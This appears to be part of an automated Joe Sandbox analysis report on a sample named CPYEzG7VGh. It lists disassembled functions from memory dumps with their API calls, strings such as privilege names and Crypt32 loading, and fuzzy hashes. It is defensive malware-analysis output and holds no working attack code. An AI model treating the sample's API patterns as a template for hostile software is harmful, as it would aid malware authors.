Opcode ID: 487e76caee72dca562d516c879af5ad784a7294596807fc164fd4771c6cbb6e0
Instruction ID: 06f0bca0f587961bb8acc0ccdba5179916208dc2332a5923212ec480ca0169a4
Opcode Fuzzy Hash: 487e76caee72dca562d516c879af5ad784a7294596807fc164fd4771c6cbb6e0
Instruction Fuzzy Hash: E6F04F31A18618BBDB17ABA5DC09BDEBFB9EF05715F054069F806A61A0DB348A40CB94

Function 0037EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00380085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003800A0
Part of subcall function 00380085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0037EB86,Crypt32.dll,00000000,0037EC0A,?,?,0037EBEC,?,?,?), ref: 003800C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0037EB92
GetProcAddress.KERNEL32(003B81C0,CryptUnprotectMemory), ref: 0037EBA2

Strings

CryptProtectMemory, xrefs: 0037EB8C
Crypt32.dll, xrefs: 0037EB7C
CryptUnprotectMemory, xrefs: 0037EB98

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 435fe291912ed0296365f7bce82b33490e0a4d8e136b9d922291967343b7866a
Instruction ID: 549a04f829cf91a289fd57bcb21695071e90eb866901aa50e15fd3624e035b72
Opcode Fuzzy Hash: 435fe291912ed0296365f7bce82b33490e0a4d8e136b9d922291967343b7866a
Instruction Fuzzy Hash: DAE04F714047419ECB339F349849B82BEE49B1A700F01C85DF4D6D3150D7B4D5448B50

Function 00397DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00397E4B
_free.LIBCMT ref: 00397E6B

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2d6854a4b23e74687cc0bd0ba81f3d26460fe9a248ec2750db4958a7d09bc3da
Instruction ID: db7335bfc5fb8671f7ed47763998fcf774b4d9e95e6a092d28ba22eedd4846ca
Opcode Fuzzy Hash: 2d6854a4b23e74687cc0bd0ba81f3d26460fe9a248ec2750db4958a7d09bc3da
Instruction Fuzzy Hash: 9F41B132E103049FDF26DF78C881A6EB7A5EF89714F1645A9E515EB291DB31ED01CB80

Function 0039B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0039B619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0039B63C

Part of subcall function 00398518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0039C13D,00000000,?,003967E2,?,00000008,?,003989AD,?,?,?), ref: 0039854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0039B662
_free.LIBCMT ref: 0039B675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0039B684

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: d804aa6ee0fa267e73e80b014b9a7a7e4aaab79bcd46212a62027733b45c00e7
Instruction ID: 7225977a5eb9276f28c8d7d67b9926e23aabaef842591b451a0653b881147d31
Opcode Fuzzy Hash: d804aa6ee0fa267e73e80b014b9a7a7e4aaab79bcd46212a62027733b45c00e7
Instruction Fuzzy Hash: 06018472602315BFAB2316BA7D8CC7BAA6DDEC7BA03160229B904C7110DF60DD0191B0

Function 0038075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00380A41: ResetEvent.KERNEL32(?), ref: 00380A53
Part of subcall function 00380A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00380A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0038078F
CloseHandle.KERNEL32(?,?), ref: 003807A9
DeleteCriticalSection.KERNEL32(?), ref: 003807C2
CloseHandle.KERNEL32(?), ref: 003807CE
CloseHandle.KERNEL32(?), ref: 003807DA

Part of subcall function 0038084E: WaitForSingleObject.KERNEL32(?,000000FF,00380A78,?), ref: 00380854
Part of subcall function 0038084E: GetLastError.KERNEL32(?), ref: 00380860

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 1da5270f7356dbd97e1da3c87936f9352beb583275764d6aa43efe21aee3c378
Instruction ID: e2666e9d54638a309784b7d39360800e3181227a4e6f3b38d0d8c0e376c2b023
Opcode Fuzzy Hash: 1da5270f7356dbd97e1da3c87936f9352beb583275764d6aa43efe21aee3c378
Instruction Fuzzy Hash: 62018071440B04EFC723EB65DC84B86FBADFB4A710F000559F15B42160CB756A488B90

Function 0039BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0039BF28

Part of subcall function 003984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0039BFA7,003A3958,00000000,003A3958,00000000,?,0039BFCE,003A3958,00000007,003A3958,?,0039C3CB,003A3958), ref: 003984F4
Part of subcall function 003984DE: GetLastError.KERNEL32(003A3958,?,0039BFA7,003A3958,00000000,003A3958,00000000,?,0039BFCE,003A3958,00000007,003A3958,?,0039C3CB,003A3958,003A3958), ref: 00398506

_free.LIBCMT ref: 0039BF3A
_free.LIBCMT ref: 0039BF4C
_free.LIBCMT ref: 0039BF5E
_free.LIBCMT ref: 0039BF70

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8ffbadbb3db6ead6beed775684b808fc0a4441c670ad3536892437b8fc9de7db
Instruction ID: 32ac70a5469e60a6c48e68d2c52c37c8d6e32cc5994e2e52878ffa1261566b80
Opcode Fuzzy Hash: 8ffbadbb3db6ead6beed775684b808fc0a4441c670ad3536892437b8fc9de7db
Instruction Fuzzy Hash: 76F0FF33508605ABCE22EB69FEC6C16B7DDBE41714B674819F049DB920CB20FC808A64

Function 00377574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00377579

Part of subcall function 00373B3D: __EH_prolog.LIBCMT ref: 00373B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00377640

Part of subcall function 00377BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00377C04
Part of subcall function 00377BF5: GetLastError.KERNEL32 ref: 00377C4A
Part of subcall function 00377BF5: CloseHandle.KERNEL32(?), ref: 00377C59

Strings

SeSecurityPrivilege, xrefs: 003775BE
SeRestorePrivilege, xrefs: 003775D3

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 348656f142b8b5a20d853e1b9d110eb81853a60290f6fee5a2bd2b5b001b5148
Instruction ID: 3c134619c9b8e0f901d697de4ffeebd2cf899212dace05b35fb2bf87559e063b
Opcode Fuzzy Hash: 348656f142b8b5a20d853e1b9d110eb81853a60290f6fee5a2bd2b5b001b5148
Instruction Fuzzy Hash: 9531E771A04248AEDF33EBA8DC41BEE7B7CAF15314F008159F549AB152C7788A44C7A1

Function 0038A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365

EndDialog.USER32(?,00000001), ref: 0038A4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0038A4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0038A4E2

Strings

ASKNEXTVOL, xrefs: 0038A448

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 373ee3a338e0bc6ed853f82b29d742c4cfb764c292933b00b56cd69dd0663ea0
Instruction ID: 5b88bf3c41ae266e8c4e2b528fe0358f984b6f002dd2707b6ee412a5778eab32
Opcode Fuzzy Hash: 373ee3a338e0bc6ed853f82b29d742c4cfb764c292933b00b56cd69dd0663ea0
Instruction Fuzzy Hash: 5211B632245700AFEE23AFA9EC4DF6A77ADEB4A700F114047F2459B2A1C7A59911D722

Function 0037D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0037D22E
_strncpy.LIBCMT ref: 0037D278

Strings

$%s, xrefs: 0037D223
@%s, xrefs: 0037D218

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 49040161f0250d0ca51a62a0b2bd2035525dda9224ad07d6290b8d9b95e9431d
Instruction ID: e9a762f15326617b441407578e8b792961be56df63e59c9ecd471d7b6d0480b2
Opcode Fuzzy Hash: 49040161f0250d0ca51a62a0b2bd2035525dda9224ad07d6290b8d9b95e9431d
Instruction Fuzzy Hash: 8E218132440208AADF32DEA4CC06FEE7BBCEF05300F048916FA199A192D775DA56DB51

Function 0037B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0037B51E

Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D

_wcschr.LIBVCRUNTIME ref: 0037B53C
_wcschr.LIBVCRUNTIME ref: 0037B54C

Strings

%c:\, xrefs: 0037B514

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 491d6fecdddb0d6a04db8f8aaa8ad87f7158bcc2cda7625e0321c18b3d4596bb
Instruction ID: ce523d6902f44c361e50bc0b263aa145b7c4b60bbb9454d4eec35c244c65ecb0
Opcode Fuzzy Hash: 491d6fecdddb0d6a04db8f8aaa8ad87f7158bcc2cda7625e0321c18b3d4596bb
Instruction Fuzzy Hash: B601D653A04312BBCA336B659C46E6BE7BCDF97370751841AF849DA081EB38D950C2A1

Function 003806BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0037ABC5,00000008,?,00000000,?,0037CB88,?,00000000), ref: 003806F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0037ABC5,00000008,?,00000000,?,0037CB88,?,00000000), ref: 003806FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0037ABC5,00000008,?,00000000,?,0037CB88,?,00000000), ref: 0038070D

Strings

Thread pool initialization failed., xrefs: 00380725

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: ef9072be812af2c0453e51e81f667c234c0a669904edcfa53e4007262752c279
Instruction ID: 18e2e0371b514fdae4b77aa5899c039f3d85b10ce39b0daea7cbde2d615c213e
Opcode Fuzzy Hash: ef9072be812af2c0453e51e81f667c234c0a669904edcfa53e4007262752c279
Instruction Fuzzy Hash: 0211C2B1600708AFC3326F75CC88AA7FBECEB95744F21482EF1DA87200D6716980CB60

Function 0038D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 0038D3DE
REPLACEFILEDLG, xrefs: 0038D3C9, 0038D3FD

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 1e809c588fb9ad2d45aeb3357dee6c013bd3fa0c27526cdf5993a9b0608f4aec
Instruction ID: f6eba704132cc422f2df9b157a7e704c1ffa597cbddb1d4cf9730d66de6bad7e
Opcode Fuzzy Hash: 1e809c588fb9ad2d45aeb3357dee6c013bd3fa0c27526cdf5993a9b0608f4aec
Instruction Fuzzy Hash: 5E01B175600345AFCB13AF1AEC44E9A7BADE714388F004561F605D3270CAB1A850EBA1

Function 003991DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00399269
__alldvrm.LIBCMT ref: 0039946A
__alldvrm.LIBCMT ref: 0039948C

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction ID: db8d74d3de0dfac497174beac127dbf9a9f350b38e0aa3f0c9d616ce7046d84c
Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction Fuzzy Hash: DBA16636A043869FEF23CF6DC8817AEBBE5EF55310F1945AFE4859B281C2348842C750

Function 0037A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,003780B7,?,?,?), ref: 0037A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,003780B7,?,?), ref: 0037A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,003780B7,?,?,?,?,?,?,?,?), ref: 0037A416
CloseHandle.KERNEL32(?,?,00000000,?,003780B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0037A41D

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 5141544d01ba9cbaa7c0329ecce09ff9de797f8c4988858e5016adcde595877d
Instruction ID: e86ab2e8a0c4ac2f54808ca9b3ad7b6c0436df16a1a043931aaef23439659094
Opcode Fuzzy Hash: 5141544d01ba9cbaa7c0329ecce09ff9de797f8c4988858e5016adcde595877d
Instruction Fuzzy Hash: B641DD30248780AAE732DF24CC45BAFBBE8ABC5700F04891CF5D9A7181D668DA48DB13

Function 0039C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,003989AD,?,00000000,?,00000001,?,?,00000001,003989AD,?), ref: 0039C0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0039C16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,003967E2,?), ref: 0039C181
__freea.LIBCMT ref: 0039C18A

Part of subcall function 00398518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0039C13D,00000000,?,003967E2,?,00000008,?,003989AD,?,?,?), ref: 0039854A

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 9a259150b16b69e4aa18ea43b451c802d4eb746e364579c885c2a22c1f01c53f
Instruction ID: c524e6ad31372bb96402c5ccf0411296cabeadcea02f274aad1812fbd3a3c6d5
Opcode Fuzzy Hash: 9a259150b16b69e4aa18ea43b451c802d4eb746e364579c885c2a22c1f01c53f
Instruction Fuzzy Hash: DD31EF72A1020AABDF269F64DC41DEE7BA9EB45310F050168FC05DB251EB35CD50CBA0

Function 00389DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00389DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00389DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00389DDB
ReleaseDC.USER32(00000000,00000000), ref: 00389DE9

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7edbd62d32c751e7d209102ec194ae52d8626ecda572f11ad813ee601e33f72c
Instruction ID: 7ae4902844fccde501fd9ec805709eb602f163020f8f6c5480f6fbab137934ab
Opcode Fuzzy Hash: 7edbd62d32c751e7d209102ec194ae52d8626ecda572f11ad813ee601e33f72c
Instruction Fuzzy Hash: 9DE0EC71986721ABD7221BA5BC0DB9B3B5CAB19712F054106F70596194DA704405CB94

Function 00392016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00392016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0039201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00392020

Part of subcall function 0039310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0039311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00392035

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
